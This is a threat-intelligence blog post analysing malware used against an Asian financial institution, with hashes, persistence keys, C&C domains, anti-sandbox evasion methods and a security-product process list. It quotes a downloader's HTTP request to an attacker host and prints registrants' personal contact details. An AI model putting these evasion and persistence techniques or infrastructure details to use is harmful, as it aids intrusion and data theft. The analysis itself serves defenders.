Multiple Malwares used to Target an Asian Financial Institution

Recently, Cyphort Labs received multiple malware samples that were used to target a financial institution in Asia. Due to an ongoing investigation, we will keep the company name anonymous. The source said, initial entry of the attack is a spear phishing email sent to one of the employees. The attack involves multiple backdoors and info-stealing trojans. Some of the malware exhibits anti-sandbox properties and includes protection against heuristic signatures commonly used by anti virus companies. The various malware samples also show a common theme, like installing themselves in the %ProgramFiles% or in the %UserProfile% folder depending on whether the user has admin privileges or not. Additionally, the majority of the malware samples are compiled with Borland Delphi with their strings encrypted and API strings either obfuscated or divided into several strings as protection against heuristic signatures. None of the samples are packed except for one.

Based on the file creation date of the files, it appears the attack started as early as January 2015 and lasted for three months. 

 

Summary of samples used in this attack

Filename	MD5	Malware Family	Compiler	Packer	Function
GoogleUpdate.exe	34bad798c01b4b52d708c1409590ea30	Invader	Borland Delphi	None	Backdoor,
Flash32.exe	a32d4a717fde77f437f9a01a7b8b8478	Invader	Borland Delphi	None	Backdoor
mslives.exe	52f4092576e46747db71fb2c018d6ec5		Borland Delphi	None	Downloader
nethost.exe	3f9e7a1fb8093994ea0f0bbf151ff1e0	Nioupale	C++	None	Backdoor
mpsvc.exe	4e25c2fc8cb2c57ae66ee3cf851e4bc7	Nioupale	Borland Delphi	None	Backdoor
winhost.exe	044e2e7c4813accdbe030c49cef3326b	Hdoor	Borland Delphi	Aspack	Backdoor
dllhost.exe	387942a24884ccadb60b7e7670a0f723		C++	None	Downloader
shell64.dll	abf5e379e336f0e6f7314f8bb3f7bcba	PCclient	C++	None	Infostealer
shell64_u.dll	756c11141ab617a2fe38b963a5548378		C++	None	Loader

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Technical Analysis

GoogleUpdate.exe

The file structure of the file is not common as we see on prevalent malware today. Why? because most AV products today employ heuristic based detection that detects packed samples and samples with an uncommon file structure. This malware is not packed and sections resemble a normal file.

Strings are encrypted and will only be decrypted right before use.  The malware also divides its APIs into several strings. This is also to avoid heuristic signatures that detect strings and suspicious APIs.

 

It drops a copy of itself in %Pr0gramFiles% folder if user is admin and %UserProfile% folder if not

If admin:

• %ProgramFilesDir%\Windows NT\Accessories\nt\GoogleUpdate.exe

If not admin:

• %UserProfile%\Applications\GoogleUpdate.exe

It installs itself as a service with a service name of “SENSS”.  

 

After checking that it is successfully running as a service, it checks if the parent process is explorer.exe or iexplore.exe . If so, it will load its dll file from its data section. This dll is encrypted via XOR with 0x89 as key. Otherwise, it will enumerate processes and find services.exe and injects its dll.

Anti-Sandbox

Detects Sleep Acceleration

To defeat a sandbox, this malware delays execution  through sleeps or loops because it knows a sandbox system will execute the the malware for a short limited amount of time. By contrast, once inside your system, the malware has the luxury of time to perpetrate its malicious intent. To defeat this, sandbox systems employ acceleration, that is if they detect that a sample uses a delay, it will accelerate it. For example, if it detects the sample sleeps for 1 minute it will change it to sleep for 1 second. Unfortunately, for this malware, this technique will not work. It is able to detect sleep acceleration by issuing a sleep and gets the time elapsed after that and checks if the  time elapsed is lower than the time of sleep.

 

 

Detects API hooks

Sandbox systems also hooks APIs to tell the behavior of a file. This malware detects hooks by checking if the first instruction of a certain API is a jmp, call or a push-retn. It checks if the start byte of an API address is either of the following bytes:

• E8
• E9
• EB
• FF
• 68????????C3 (push retn)

 

 

Payload

The injected code is a backdoor that communicates to the following C&C servers:

• bbs.gokickes.com:80
• img.lifesolves.com:8080
• domain.gokickes.com:443

 

Depending on backdoor commands, this malware is capable of the following

• Download and execute additional files 

• Capture Screenshots
• Capture Mouse and keyboard events

• Update itself
• Opens remote shell
• Terminate Process
• Enumerate Network Shares
• Enumerate Drives
• Uninstall itself

Lastly, all data sent and received from server is encrypted with XOR key 0xD5

 

 

mslives.exe

This sample has similar file structure as GoogleUpdate.exe but it doesn’t employ similar anti-sandbox tricks.

When first ran, it sleeps for 300 seconds before doing its installation routine.  Afterwards, it creates a copy of itself as follows:

• %ProgramFiles%\Windows NT\Accessories\Microsoft\mslives.exe

The copy however as written with large garbage of data at the end of the file that balloons its file size to more than 100MB. It writes to this file 100KB of data 1000 times. There are two things this behavior tries to evade sandbox. First,  this malware however does not create a copy of itself technically which makes this malware’s behavior unusual and may appear to sandbox as benign behavior. The usual malware behavior is to create an exact copy of itself. Second, the multiple writing event might exceed the sandbox limit and the file size of the dropped copy will make it unsuspecting for the sandbox.

 

 

It executes its dropped copy using CreateProcess then checks if it is running as iexplore.exe, if not, it will create a suspended process of iexplore.exe and injects its code into it by overwriting to iexplore.exe’s main module.

It creates a hidden windows with window name and class name “111111”. 

It then creates an autostart registry entry below to let it run at every startup.

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • Valuue: msliveupdate
  • Data: %ProgramFilesDir%\Windows NT\Accessories\Microsoft\mslives.exe

 

Payload

This sample has only one purpose and that is to download and execute a file downloaded from forum.energymice.com.

_{GET /view/login.asp HTTP/1.1}

_{Content-Type: */*}

_{User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; 5.1)}

_{Host: forum.energymice.com}

_{Cache-Control: no-cache}

It downloads the file in the %TEMP% folder and executes it. Unfortunately, at the time of our analysis, the download URL is not returning any binary.

 

 

winhost.exe

Unlike the other files this one is clearly packed. PEiD identifies the packer as follows:

• ASProtect 1.2x – 1.3x [Registered] -> Alexey Solodovnikov

This file is a backdoor named “HDOOR” as we found this string in its body. We also found other interesting strings which indicates the protector used.

• HDoor, Version 1.0
• Copyright (C) 2013
• (c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com.

 

This is a backdoor  that listens to port 143 and waits for the client to connect and issue commands. Port 143 is the default IMAP non-encrypted port. IMAP or (Internet Message Access Protocol)  is a mail protocol used for accessing email on a remote web server from a local client.

It checks if the user is admin or not.  If the user is admin, it will install itself as a service and drops a copy in the following directory:

• %ProgramFiles%\Common Files\System\NT\lib\winhost.exe

If the user is not admin, it will install itself as follows and creates an autostart key entry in the registry.

• %USERPROFILE%\System\winhost.exe

Autostart Registry Entry:

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  • Value: Microsoft Messenger
  • Data: %USERPROFILE%\System\winhost.exe

 

Payload

 

 

It is capable of performing the following depending on the attacker’s command.

• Disconnect
• Get backdoor install path
• List directory or files
• Type a txt file content
• Execute A Program
• Download A File
• Get A CMD Shell
• Exit CMD Shell
• Upload a file
• Download a file
• Load dll library
• Free dll library

 

nethost.exe

Install a copy of itself as follows depending if the user is admin or not:

If user is admin:

• %ProgramFiles% \common files\system\library\nethost.exe

Installs itself as a service:

• HKLM\System\CurrentControlSet\Services\ncoglsse
  • DisplayName = Microsoft Wireless Device Service
  • ImagePath = %ProgramFiles% \common files\system\library\nethost.exe

If not admin:

• %USERPROFILE% \system\library\nethost.exe

It creates the following autostart key

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Value: “ncoglsse”
  • Data: %ProgramFiles%\common files\system\library\nethost.exe

After installation, it will inject to lsass.exe to stay memory resident and execute its payload.

Payload

It downloads from the following URLs

• http://hud321.astringer.com/images/log.gif
• http://grop.waterglue.org/images/logg.gif
• http://hud.astringer.com/images/log.gif

The content of the downloaded files are encrypted URLS that it uses to connect to its C&C. The malware connects to this URL using HTTP POST and sends the following information.

• IP address
• Language ID
• Malware version
• OS version
• Machine name

 

It receives commands from the C&C and it is capable of the following:

• Collect information about the drives and folders on your PC
• List Files

• Download files
• Terminate Processes
• Open CMD shell

 

Shell64.dll  

Shell64_u.dll – Loader Component

The loader component runs as a service, loading the espionage component and makes sure the infection keeps intact. The service, including the service name, is to be configured by the malware dropper, which is not known at the time of writing. Strings embedded in the loader component suggest the binary is packed with the Dyamar binary protector, but the binary does not leave the impression of being thoroughly protected.

Simple obfuscation elements, induced by macros and a number of obfuscated strings show attempts of complicating the analysis but are easily bypassed. Also the binary comes with three dummy exports, which show more of the obfuscation elements. Interestingly, the binary keeps a log file, located under C:\debug.txt, where debug messages are written to. This is rather uncommon for binaries found in the wild.

The ServiceMain method will direct execution to one of the exports, either ‘LoadFunc’ for Windows OS versions below 6.0, or to ‘win7load’ for 6.0 and above. Said exports load the espionage component, running it via a spawned rundll32.exe process with the according parameters set. This second stage binary exports two functions, ‘main’ and ‘lowmain’, which are again suited for OS versions below and above 6.0.

 

Shell64.dll – Espionage Component

The espionage component comes with the internal name ‘Server.dll’. It exports the functions ‘main’ and ‘lowmain’, where main serves OS versions 6.0 and above, while lowmain serves versions below 6.0. Just like the loader component this binary creates and maintains the file C:\debug.txt where debugging information is written to.

During startup shell64.dll creates a named mutext, dubbing it ‘Global\\KongQi [TickCount]’, where TickCount is the actual time stamp at the time of infection. Also the malware creates a named view which is used to exchange runtime information among threads and intruded processes, dubbed ‘_kaspersky’. The name is doubtlessly chosen to add stealth.

During startup the malware gathers information about the infected system and sends it to its remote server. The information includes:

• Hostname
• System CPU power
• OS version
• Drive geometry for PHYSICALDRIVE0
• Global memory status
• Video capture driver description
• Installed security products based on running processes list

 

Security Product Enumeration

The list of products to be searched for is long:

Process Name	Anti-Virus
fsav32.exe , MsMpEng.exe	F-Secure
FPAVServer.exe	F-PROT
BullGuardScanner.exe	BullGuard
vrmonsvc.exe	ViRobot
AYRTSrv.aye	ALYac
V3lsvc.exe	V3Lite
Kxetray.exe	King
KSafeSvc.exe	King Defender
TMBMSRV.exe	Trend
knsdtray.exe, FilMsg.exe, V3SP.exe	Keniu
RavMonD.exe	Rising
KvMonXP.exe	JiangMin
Mcshield.exe	McAfee
avgnsx.exe	NOD32
AvastSvc.exe	Avast!
dwengine.exe	Dr.Web
secenter.exe	BitDefender
avguard.exe	Avira
ccSvcHst.exe	Norton
avp.exe	Kaspersky
360sd.exe	360 Antivirus
360tray.exe	360 Defender

 

The following firewall installations will also be enumerated:

• Norton Personal Firewall        
• ZoneAlarm                       
• Comodo Firewall                 
• eTrust EZ Firewall              
• F-Secure Internet Security      
• McAfee Personal Firewall        
• Outpost Personal Firewall       
• Panda Internet Seciruty Suite   
• Panda Anti-Virus/Firewall       
• BitDefnder/Bull Guard Antivirus
• Rising Firewall                 
• 360Safe AntiArp

 

Espionage Capabilities

Once the malware is all set up and running it waits for instructions from the remote servers. Its capabilities are plenty, and are all designed to steal data from the infected system. Spied information is compressed with the deflate algorithm and sent to a remote server. A list of analyzed functions is as follows:

• Video Captures using a capture window named CVideoCap while compressing the video using the Windows VCM API (Video Compression Manager)
• Sound captures from the system’s sound input device, i.e. microphone
• Stealing data from the current desktop’s clipboard, which can yield passwords from password managers
• Capture screenshots and compress them, exfiltrate as a stream
• The sample includes a userland keylogger, setting a global Windows hook via SetWindowsHookEx to listen for keyboard events, which are parsed through Windows IMM API (Input Method Manager); keystrokes are dumped to a file named ‘jpjl.dat’, created within the Windows system directory
• Clear event logs for ‘Application’, ‘Security’ and ‘System’, which is usually done to erase forensic evidence of an intrusion
• Shut the system down, which eventually forces a reboot
• Create a local user account with the description ‘This user account is used by the Visual Studio .NET Debugger’
• Download files and execute them
• Execute other binaries from disk
• Enumerate files and file attributes on the system, modify and deletie files and directories
• Enumerate window names of opened applications
• Enumerate system attributes like OS version, CPU power or memory capacities of the disk, system up time, number of processors, names of running processes while matching for security products, computer name, user name of current user, attached drives

• Enumerating parameters for dial-up connections, such as phone number and device name
• Enable terminal services and allow remote connections
• Pop message boxes
• Open a socket for sending and receiving data
• Delete its files and persistence mechanisms from the machine, i.e. uninstall the service and remove an auto-run registry key located under [HKLM]\..\CurrentVersion\Run named ‘MSLiveMessenger’; it is unclear though, how this key is created in the first place

 

Persistence Methods

The binaries are designed to run in the context of a Windows service, which is assumed to be set up by the according dropper. The service name remains unclear, as it is also set by the dropper. However, the malware comes with the capability to inject its payload to remote processes and contains a function to inject to winlogon.exe (in Windows versions prior to 6.0).

 

dllhost.exe

This malware does not do much. It only tries to download from blog.softfix.co.kr:80.

Who’s behind?

The attacker used C&C servers that are registered in Korea with registration records looking fake. Some of the C&C servers are also owned by hugedomains.com which is a company that sells previously owned domains and have a service that hides the information. We also noticed that based on the strings in the binary, it’s clear that it does not come from native English speaker.

 

 

Whois Records of C&C used

bbs.gokickes.com:80, domain.gokickes.com:443 (GoogleUpdate.exe)	Emails     dodomonk@mail.com (a, t, r) Names smith jack (a, t, r) Organizations      Streets seoul, korea (a, t, r) Cities seoul (a, t, r) States seoul (a, t, r) Postals 158070 (a, t, r) Countries KR (a, t, r) Phones 8245896312 (a, t, r)
img.lifesolves.com:8080 (GoogleUpdate.exe)	Emails     jimkimteen@mail.com (a, t, r) Names zhang yunqiang (a, t, r) Organizations      Streets Taiping Road (a, t, r) Cities seoul (a, t, r) States seoul (a, t, r) Postals 100-744 (a, t, r) Countries KR (a, t, r) Phones 82527656289 (a, t, r)
softfix.co.kr (dllhost.exe)	Registrant                  : gson Administrative Contact(AC)  : zhang yunqiang AC E-Mail                   : jimkimteen@mail.com Registered Date             : 2014. 01. 08. Last Updated Date           : 2014. 01. 08. Expiration Date             : 2016. 01. 08. Publishes                   : N Authorized Agency           : Gabia, Inc.(http://www.gabia.co.kr) DNSSEC                      : unsigned
diskoco.com (mpsvc.exe)	Registrant Name:yang qi Registrant Organization:yang qi Registrant Street:Guancheng District No126 Registrant City:dong guan Registrant State/Province:Guangdong Registrant Postal Code:523000 Registrant Country:China Registrant Phone:+86.0769 89098138 Registrant Phone Ext: Registrant Fax:+86.0769 89098200 Registrant Fax Ext: Registrant Email:softmoon@mail.com
forum.energymice.com (mslives.exe)	Registrant Name: Domain Admin Registrant Organization: HugeDomains.com Registrant Street: 2635 Walnut Street Registrant City: Denver Registrant State/Province: CO Registrant Postal Code: 80205 Registrant Country: US Registrant Phone: +1.303.893.0552 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: domains@hugedomains.com
astringer.com (nethost.exe)	Registrant Name: Domain Admin / This Domain is For Sale Registrant Organization: HugeDomains.com Registrant Street: 2635 Walnut Street Registrant City: Denver Registrant State/Province: CO Registrant Postal Code: 80205 Registrant Country: US Registrant Phone: +1.303.893.0552 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: domains@hugedomains.com
waterglue.org	Registrant Name:Registration Private Registrant Organization:Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 14747 N Northsight Blvd Suite 111, PMB 309 Registrant City:Scottsdale Registrant State/Province:Arizona Registrant Postal Code:85260 Registrant Country:US Registrant Phone:+1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email:WATERGLUE.ORG@domainsbyproxy.com

 

 

Malware doesn’t need to be advanced to be effective

These malwares are not advanced and they are also the family of malware we have seen before yet they were able to infiltrate and bypass security. The malware were able to reside unnoticed for three months which gives the attacker plenty of time to operate. This proves that malware doesn’t need to be advanced or sophisticated to be able to get through.  

AV is still our best defense, they block majority of security events, it’s just that there are too many malware attacks with various techniques that there is no single security security solution that will stop all these attacks. That is why we need multiple security solutions and we need security people in our respective organizations.

 

Why spear phish?

The initial entry of the malware is a spear phishing email that targets one of the head of the company.  According to a report from TrendMicro, spear-phishing is still the most favored APT attack bait. They said that “APT campaigns frequently make use of spear-phishing tactics because these are essential to get high-ranking targets to open phishing emails. “

It is easy for the attacker to guess email address of people  in organization especially if they are high-ranking officials as their names are available online. The attackers can easily profile them by searching any available info online. This makes the attacker customize their attack according to the profile of the target.

As proven, attackers usually target the weakest point and more often, the weakest point is the people in our organization. This is a message that to protect our organization, we must also educate and train all the people within our organization for proper security practices so as not to fall with these types of social engineering attacks.

Special thanks to Marion Marschalek and the rest of the Cyphort Labs team for their help in analysis of this attack. 

 

 

The post Multiple Malwares used to Target an Asian Financial Institution appeared first on Cyphort.